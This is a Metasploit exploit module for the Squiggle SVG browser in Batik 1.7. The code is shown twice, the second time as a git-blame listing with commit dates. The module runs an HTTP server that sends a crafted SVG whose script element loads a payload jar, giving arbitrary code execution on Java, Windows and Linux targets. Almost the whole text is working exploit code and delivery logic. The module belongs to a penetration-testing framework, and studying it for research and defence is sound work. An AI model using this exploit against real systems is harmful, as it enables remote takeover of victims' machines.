modules/exploits/multi/misc/batik_svg_java.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Squiggle 1.7 SVG Browser Java Code Execution",
      'Description'    => %q{
          This module abuses the SVG support to execute Java Code in the
        Squiggle Browser included in the Batik framework 1.7 through a
        crafted SVG file referencing a jar file.

        In order to gain arbitrary code execution, the browser must meet
        the following conditions: (1) It must support at least SVG version
        1.1 or newer, (2) It must support Java code and (3) The "Enforce
        secure scripting" check must be disabled.

        The module has been tested against Windows and Linux platforms.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC
          'sinn3r',           # Metasploit module
          'juan vazquez'      # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '81965'],
          ['URL', 'http://www.agarri.fr/blog/']
        ],
      'Payload'       =>
        {
          'Space' => 20480,
          'BadChars' => '',
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => %w{ java linux win },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-05-11',
      'DefaultTarget'  => 0))

  end

  def on_request_uri(cli, request)

    agent = request.headers['User-Agent']
    jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
    jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"
    rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)

    if request.uri =~ /\.jar$/
      paths = [
        [ "Exploit.class" ],
        [ "Exploit$1.class"],
        [ "META-INF", "MANIFEST.MF"]
      ]

      p = regenerate_payload(cli)

      jar  = p.encoded_jar
      paths.each do |path|
        1.upto(path.length - 1) do |idx|
          full = path[0,idx].join("/") + "/"
          if !(jar.entries.map{|e|e.name}.include?(full))
            jar.add_file(full, '')
          end
        end

        fd = File.open(File.join( Msf::Config.data_directory, "exploits", "batik_svg", path ), "rb")
        data = fd.read(fd.stat.size)
        jar.add_file(path.join("/"), data)
        fd.close
      end

      print_status("#{cli.peerhost} - Sending jar payload")
      send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})

    elsif agent =~ /Batik/
      svg = %Q|
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">
      <script type="application/java-archive" xlink:href="#{jar_uri}"/>
      <text>#{rand_text}</text>
      </svg>
      |

      svg = svg.gsub(/\t\t\t/, '')
      print_status("#{cli.peerhost} - Sending SVG")
      send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})

    else
      print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")
    end
  end
end
Msftidy fixes. 2012-05-21 10:59:52 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Msftidy fixes. 2012-05-21 10:59:52 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpServer::HTML`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Squiggle 1.7 SVG Browser Java Code Execution",`
			`'Description' => %q{`
			`This module abuses the SVG support to execute Java Code in the`
			`Squiggle Browser included in the Batik framework 1.7 through a`
			`crafted SVG file referencing a jar file.`

			`In order to gain arbitrary code execution, the browser must meet`
			`the following conditions: (1) It must support at least SVG version`
			`1.1 or newer, (2) It must support Java code and (3) The "Enforce`
			`secure scripting" check must be disabled.`

			`The module has been tested against Windows and Linux platforms.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC`
			`'sinn3r', # Metasploit module`
			`'juan vazquez' # Metasploit module`
			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '81965'],`
Retab modules 2013-08-30 16:28:54 -05:00			`['URL', 'http://www.agarri.fr/blog/']`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 20480,`
			`'BadChars' => '',`
			`'DisableNops' => true`
			`},`
			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 10:43:45 +02:00			`'EXITFUNC' => 'thread'`
Retab modules 2013-08-30 16:28:54 -05:00			`},`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ java linux win },`
Retab modules 2013-08-30 16:28:54 -05:00			`'Targets' =>`
			`[`
			`[ 'Generic (Java Payload)',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`}`
			`],`
			`[ 'Windows Universal',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win'`
			`}`
			`],`
			`[ 'Linux x86',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'linux'`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-05-11',`
Retab modules 2013-08-30 16:28:54 -05:00			`'DefaultTarget' => 0))`

			`end`

			`def on_request_uri(cli, request)`

			`agent = request.headers['User-Agent']`
			`jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource`
			`jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"`
			`rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)`

			`if request.uri =~ /\.jar$/`
			`paths = [`
			`[ "Exploit.class" ],`
			`[ "Exploit$1.class"],`
			`[ "META-INF", "MANIFEST.MF"]`
			`]`

			`p = regenerate_payload(cli)`

			`jar = p.encoded_jar`
			`paths.each do \|path\|`
			`1.upto(path.length - 1) do \|idx\|`
			`full = path[0,idx].join("/") + "/"`
			`if !(jar.entries.map{\|e\|e.name}.include?(full))`
			`jar.add_file(full, '')`
			`end`
			`end`

Find and replace 2013-09-26 20:34:48 +01:00			`fd = File.open(File.join( Msf::Config.data_directory, "exploits", "batik_svg", path ), "rb")`
Retab modules 2013-08-30 16:28:54 -05:00			`data = fd.read(fd.stat.size)`
			`jar.add_file(path.join("/"), data)`
			`fd.close`
			`end`

			`print_status("#{cli.peerhost} - Sending jar payload")`
			`send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})`

			`elsif agent =~ /Batik/`
			`svg = %Q\|`
			`<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">`
			`<script type="application/java-archive" xlink:href="#{jar_uri}"/>`
			`<text>#{rand_text}</text>`
			`</svg>`
			`\|`

			`svg = svg.gsub(/\t\t\t/, '')`
			`print_status("#{cli.peerhost} - Sending SVG")`
			`send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})`

			`else`
			`print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")`
			`end`
			`end`
Msftidy fixes. 2012-05-21 10:59:52 -05:00			`end`